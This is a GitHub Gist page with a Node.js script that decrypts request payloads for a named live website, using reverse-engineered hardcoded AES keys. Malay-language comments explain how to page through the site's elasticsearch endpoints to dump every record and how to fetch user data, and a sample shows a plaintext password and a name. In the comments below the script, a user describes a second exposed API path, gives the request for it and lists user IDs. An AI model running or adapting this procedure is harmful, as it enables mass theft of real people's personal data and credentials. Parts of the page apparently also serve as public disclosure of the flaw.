Skip to content

Instantly share code, notes, and snippets.

@RamadhanAmizudin

RamadhanAmizudin/misirakyat.js

Created July 4, 2023 16:02
Show Gist options
  • Star 7 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save RamadhanAmizudin/67d0a279b647add5e0a7e31e88cf3477 to your computer and use it in GitHub Desktop.
Save RamadhanAmizudin/67d0a279b647add5e0a7e31e88cf3477 to your computer and use it in GitHub Desktop.
Download ZIP
misirakyat.com :)
Raw
misirakyat.js
// Sambung dari: https://www.facebook.com/100000118263227/posts/pfbid08EseyuLaiE8kK82k4neHDgDwEJ5wHwJMb99T8jKF8dTSNpfnZs2bjk89KH8cCSFfl/?d=w&mibextid=qC1gEa
const crypto = require('crypto');
const print = console.log
function getTimestamp(data) {
let key = crypto.pbkdf2Sync('misirakyat','misirakyat', 7, 32, "md5");
let iv = crypto.pbkdf2Sync('po9','misirakyat', 7, 16, "md5");
let decrypter = crypto.createDecipheriv("aes-256-cbc", key, iv);
let decrypted = Buffer.concat([
decrypter.update(data, 'base64'),
decrypter.final()
]).toString('utf8');
return decrypted.split('_')[0]
}
function getRandomInt(data) {
let key = crypto.pbkdf2Sync('misirakyat','misirakyat', 7, 32, "md5");
let iv = crypto.pbkdf2Sync('fl1','misirakyat', 7, 16, "md5");
let decrypter = crypto.createDecipheriv("aes-256-cbc", key, iv);
let decrypted = Buffer.concat([
decrypter.update(data, 'base64'),
decrypter.final()
]).toString('utf8');
return decrypted.split('_')[0]
}
function decryptRequest(input) {
let data = JSON.parse(input)
let key = crypto.pbkdf2Sync('misirakyat' + getTimestamp(data['y']),'misirakyat', 7, 32, "md5");
let iv = crypto.pbkdf2Sync(getRandomInt(data['x']),'misirakyat', 7, 16, "md5");
let decrypter = crypto.createDecipheriv("aes-256-cbc", key, iv);
dec = decrypter.update(data['z'], 'base64'),
dec += decrypter.final()
return dec
}
function encryptRequest(z, y, x) {
// :)
}
// msearch request
print(decryptRequest('{"z":"t1kE4zKRMNA9+SKDBBvqRQnwMXLH+EgOD02oUzdKgqwpWuHFpo/xD1Vxyy+vtvBYVNWj5mP3XkRw1vqfzn2SJv7z8O/fqY84hNghBVMf6Cjuvf0YdZanOkdC9WMhtPuJqp3hdSn56F+jnDy9Suff/pNGnpyjHMO+35xy6JxJrGzg0SKyt1mVnUR6Nk8pLTUZ3/a94becbAJ6OcHXYued5Gs2FOQ3zEqIrraUQ/F/BoQkYfYRDfg3M/uYzgu5EhFXuHSphisewfNFSdBnDCF6w7UVMQA6zmfJBBkWML0p8JyMTjLZJ0iF6EJGh8ehA/ZoxU9azejH0fBuNbYhQ8FVuUyYVfptahTC73GoQvV3JlSSDW8MKqZkzZxWyKo5MsWd","y":"rE/PfBAMwbYFaXxgDRBdhA==","x":"Er97OdzkLnHQTH6wg/ZgSW3YNiH2RarYNs9CX9NbQic="}'))
// mget request
print(decryptRequest('{"z":"io58PiyPruXYV4KoQm+mI2xj9fYQyAcblVYcM711Di1jZlg4+Yy9UxvBQT8ix9YOhSZR8NnLxLUgDFF99cTtAJm1o7V9wRqNYqwFAQRwN8ZoUf/Olmqk3DM7BQybq2qeK4qyYrbqdOzJ5urIzkkviulz5kkGAGcMlL94OL9eW6gdlXCcVofvy68U8xYZjOY8Z+AORigoUnhAbEbX3iBZUvMC/OnvatHO2UAszbSm7zNdvrtCGe8QwOCYKTEbdWD6a+hT6fxmSmn7DR+6qtndQdiX8wcfe76cW1fRc8B6IqA927ctSLmtxQtUOOW0tC4SR6lClgyi088zm3ytZP1SWfgZPzne+n7lQ+qkGOag7Vrvd0gYUBDmOCvpSKUz54nBtR0/Fo0dEwUhtwSufXBM4B2KajQovF4URjm2hssORsQiV0uH7HgOX1xAGp0AkD/Os3eDfgrHycM5ep1/LRbjyps5CX5dnEdYwWH7XHtOZrOiPeURpB7PZvuFN15sfo64g69zANxTu4bbhDNnh/iqGhhq38D/fRWRrhA2A9SVJWK7sqF16BoxAyxFfUqx8kJbdhs6ysTz7o08NiqdfwPEZYg1MBiLVa87fembsa16VOQQImqVnqOnYdFQepEP2kYLGqMb7WHtXEfGVs8OqbOja4WDD8CWylxAn/HAZPetD8RoOB8GaeU9CJjWcHXjcF5AvkwZodyB+BKQ9DmMa/DZuGknEren5UPdU7H35/9fnmIYo5blklCphlA6BNdBmRHmFKpI8p6Rcgax++qJm0z3gciTNNqYNPYKKze+jksYxCunCP3JGttOJCWNcB1Xz3lwA6d6SEQdVfg5epaJnfVNSaD18zhGvo71PhX7Z/VSL1Geyfb8RayMve1n/PvnywrrnCJYgwnf6baypK//hLyyi641mpNRowwKJKf07VdxhWjP61DriIM0Mzy4Hxrn4Dv4NVK5lGyouxSGUJC4ksvD5cjDBdPlGC/YbquWI3qgaBforFs4VKwF5a1cNfZuB2zv","y":"vmFiMliJNzZGpyv7eKGYLQ==","x":"EtcdfBhx6CngqiJtgXqEREVk8iao5xyet7wQucqEQIo="}'))
// macam mana nak dump semua data?
//
// logic:
// response = request misirakyat.com/elasticsearch/msearch [n=10000,start=0]
// while response.at_end != false
// reponse = request misirakyat.com/elasticsearch/msearch [n=10000,start=++]
//
// kalau rajin boleh amik user data with password - spoiler: plain text :)
// response = request misirakyat.com/elasticsearch/mget [ids=[xx,yy,zz..]]
// Contoh response:
// _source":{"password_sementara_text":"makabu123","nama_text":"Zaxxxx","Created Date":1683443778932,"kawasan_text":"SEMANGGOL","authentication
//
//
// Yang benar
// rempah (@rempahrz)
// 2023 r0xnkekw
@farhan-helmy
Copy link

farhan-helmy commented Jul 4, 2023
edited

lmaooo serious la password plain text ssksksksk

@ariyako
Copy link

ariyako commented Jul 4, 2023

bang, WP scanner tu bila nak update terbaru 👯‍♂️

@khrnchn
Copy link

khrnchn commented Jul 5, 2023

bruv

@aqhmal
Copy link

aqhmal commented Jul 5, 2023

detik misi

@budoxe
Copy link

budoxe commented Jul 5, 2023

Seyes ar

@Kamaruzaman
Copy link

Hai

@ungkunazmi
Copy link

ungkunazmi commented Jul 5, 2023
edited

Sekadar menjernihkan lagi keadaan.

Selain di path elasticsearch , terdapat juga bug di path /api/1.1/init :v
spoiler: di /api/1.1/init berkemungkinan ada function del/edit/add , tak abis explorer lagi.

rasanya dah boleh minta takedown itu website dgn segera.

Found July 3 , Monday 3:08 AM

Request
GET /api/1.1/init/data?location=https://misirakyat.com/id/[IDxUSER] HTTP/2

Response
HTTP/2 200 OK

Sample ID From POST /elasticsearch/mget decryptRequest :

1686299905339x728270735016460300
1686298137416x952557159621328900
1686293917307x607575989128790000
1686293713660x468629340819816450
1686290761908x365577381682872300
1686286090840x237803624837152770
1686274082703x894211607030661100
1686273400658x281540547747774460
1686272329825x870919821270450200
1686270222530x455445408465813500
1686266742757x754796990000267300
1686264643168x419961457589354500
image

@aimanhey
Copy link

aimanhey commented Jul 5, 2023

Bubbleio problem?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment